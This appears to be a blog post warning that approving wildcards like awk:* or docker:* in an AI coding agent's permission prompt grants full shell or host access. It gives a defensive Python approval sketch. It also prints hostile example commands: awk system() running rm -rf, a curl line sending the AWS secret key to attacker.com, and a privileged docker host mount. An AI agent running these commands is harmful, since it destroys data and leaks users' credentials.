You are debugging a CSV parsing issue. Your AI coding agent wants to count the fields in a header row. It shows you this command:
awk -F, 'NR==1{print NF" fields in header"}' data.csv
The agent asks for permission. You see three options:
- Yes
- Yes, and don’t ask again for: awk:*
- No
You know awk as a tool for processing structured data. At first glance this looks innocuous, and option 2 is right there: approve awk and stop being interrupted.
You click option 2.
You just granted your AI agent unrestricted shell execution. Not awk execution, shell execution, because awk is not a text formatter. It is a programming language with a system() function, and awk:* covers every program that language can express.
What awk:* actually permits
awk has a built-in function called system() that executes arbitrary shell commands and returns the exit code. This is not a hidden feature. It is documented, standard POSIX, and supported by every awk implementation on every Unix system.
awk '{print NF}' file.csv counts fields. Safe. But awk '{system("rm -rf " $1)}' file.csv deletes whatever is listed in the first column, and awk 'BEGIN{system("curl -s https://attacker.com/exfil?key=" ENVIRON["AWS_SECRET_ACCESS_KEY"])}' reads your AWS secret key from the environment and sends it to an external server. No file argument needed, because the ENVIRON array exposes every environment variable in the process.
All three are awk commands. All three match the awk:* wildcard that was offered alongside a command that counts CSV columns.
awk is not special
awk is the example, but it is not the exception. docker:* covers docker run --privileged -v /:/host alpine sh. Full host access. The prompt that triggered the wildcard was probably docker ps.
The wildcard pattern command:* treats the command name as a trust boundary. For any command with embedded execution, the command name tells you nothing about what the command will do.
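As an added illustration (not code from this article or from any agent product), here is one way an approval layer could refuse to honour name-level wildcards for commands with embedded execution while still honouring exact-command approvals. The name:* matching semantics, the function names and the EMBEDDED_EXEC set are assumptions; only awk and docker come from the text above.

```python
import shlex

# Assumption: commands that can run other programs or reach the host.
# awk and docker are the article's examples; extend this for your environment.
EMBEDDED_EXEC = {"awk", "docker"}

# Command lines quoted from the article (only parsed here, never executed).
HEADER_COUNT = """awk -F, 'NR==1{print NF" fields in header"}' data.csv"""
SYSTEM_CALL = """awk '{system("rm -rf " $1)}' file.csv"""
DOCKER_PRIV = "docker run --privileged -v /:/host alpine sh"


def _argv(text):
    """Tokenise like a POSIX shell; None if the text cannot be parsed."""
    try:
        return shlex.split(text) or None
    except ValueError:
        return None


def matches(rule, command):
    """'name:*' matches any invocation of name (assumed prompt semantics);
    any other rule must equal the command token for token."""
    argv = _argv(command)
    if argv is None:
        return False
    if rule.endswith(":*"):
        return argv[0] == rule[:-2]
    return _argv(rule) == argv


def decide(command, rules):
    """Return 'allow' if a rule safely covers the command, else 'ask'."""
    for rule in rules:
        if not matches(rule, command):
            continue
        if rule.endswith(":*") and rule[:-2] in EMBEDDED_EXEC:
            continue  # the command name is not a trust boundary here
        return "allow"
    return "ask"


if __name__ == "__main__":
    rules = ["awk:*", HEADER_COUNT, "docker:*", "docker ps"]
    for cmd in (HEADER_COUNT, SYSTEM_CALL, "docker ps", DOCKER_PRIV):
        print(decide(cmd, rules), "<-", cmd)
```

Wildcards for commands outside EMBEDDED_EXEC are still matched on the first token only, so this sketch does not inspect chained commands or arguments. Exact rules compare the full token list, which is why the approved header count passes and every other awk program triggers a fresh prompt.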
The real question
The next time an AI agent asks you to approve a command, look at the “don’t ask again” option. Read the wildcard and consider the worst thing that command name could execute.
If the answer is “I don’t know,” you have your answer. Click option 1.
But you should not have to know. And right now, you do.